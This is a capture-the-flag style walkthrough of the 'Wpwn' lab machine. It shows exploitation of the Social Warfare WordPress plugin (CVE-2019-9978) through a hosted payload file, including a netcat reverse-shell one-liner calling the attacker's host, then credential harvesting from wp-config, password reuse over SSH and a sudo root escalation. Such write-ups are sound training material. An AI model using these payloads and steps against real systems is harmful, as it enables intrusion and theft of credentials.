# Wpwn

## Nmap

```
sudo nmap   192.168.178.123 -p- -sS -sV          

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Running `curl` on port 80 simply shows a basic greeting for the machine by the creator.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6d409c4ea29c5db88db363f126a052138588e817%2Fimage.png?alt=media)

With nothing else interesting we move onto directory enumeration with `dirsearch.py`.

```
sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d9b2de0b383f89d6b18675734c1fac8bad5611f3%2Fimage.png?alt=media)

With the common.txt wordlists we hit robots.txt and /wordpress. Robots contains no interesting information.

Moving over to the /wordpress directory we get the following page.

![/wordpress](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1f41338cf623f9327592353bd0cc8d6d92c5a895%2Fimage.png?alt=media)

Other than this the Wordpress site contains no interesting information. From here we can run `WPScan` in order to try and identify further information.

```
wpscan --url http://192.168.178.123/wordpress/ --passwords /usr/share/wordlists/rockyou.txt   
```

`WPScan` picks up the plugin 'social-warfare' as being installed and out of date.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2c301cc3e90b23bae472b739388e40f35867b2aa%2Fimage.png?alt=media)

Checking this against `searchsploit` reveals a RCE against the running version.

```
searchsploit -w social warfare 3.5.2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e6b5e337d08e7243b7d2fa0e9e1b7c20d5c2110%2Fimage.png?alt=media)

The vulnerability has been assigned CVE-2019-9978.

Description:

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp\_debug=load\_options swp\_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The following GitHub shows a PoC for this exploit.

{% embed url="<https://github.com/hash3liZer/CVE-2019-9978>" %}

As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.

```
<pre>system('command')</pre>
```

First I hosted a `Python SimpleHTTPServer` on my attacking machine.

```
sudo python2 -m SimpleHTTPServer 443
```

I then downloaded the associated Python script and executed as per below.

```
python2 cve-2019-9978.py  --target http://192.168.178.123/wordpress/ --payload-uri http://192.168.49.178:443/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e82b2bb42b9f3dc88cc1dd7a7b0e0de2593c4df3%2Fimage.png?alt=media)

In the example above the command included for test.txt was `'id'`. From here I replaced the command with `'which nc'` to see if `netcat` is on the target machine and then run the exploit again.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fd628de7038b0c4e9ab9861d1b1c453d2978577%2Fimage.png?alt=media)

As `netcat` is installed we can replace the command in the test.txt file with that of a `netcat` reverse shell.

Contents of test.txt:

```
<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f')</pre>
```

I then set a `netcat` listener on my attacking machine:

```
sudo nc -lvp 80
```

Running the exploit again hangs the script as we receive a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-33cb53f3c4dd570d0e8ec8f01c99da5485f45a2a%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4a182807b8577edf9c8b3c38fecd22821b564032%2Fimage.png?alt=media)

We then upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Moving back one directory in the shell we can then read the contents of wp-config for any `MySQL` database credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aaba7fa2c5c4733d8b3eb34686314637dee704d6%2Fimage.png?alt=media)

We have gathered the credentials: `wp_user:R3&]vzhHmMn9,:-5` From here I logged into `MySQL` and took the Wordpress administrator's hash. I was however, unable to crack. Looking on the box we have the user 'takis' I decided to see if password reuse was in play and `SSH` in as takis.

```
ssh takis@192.168.178.123
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f91ac480f037e15413d1172dd305ce859f2a3167%2Fimage.png?alt=media)

Now we are in as takis I then run `sudo -l` to check `sudo` permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e17cb5bb478b86d9c773b6630f6b7dcba91b3c4c%2Fimage.png?alt=media)

Looks like we can run all commands as any users without a password. A simple `sudo /bin/bash` will spawn us a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-059d5ad64121ad0feadaf62e480829722054fe71%2Fimage.png?alt=media)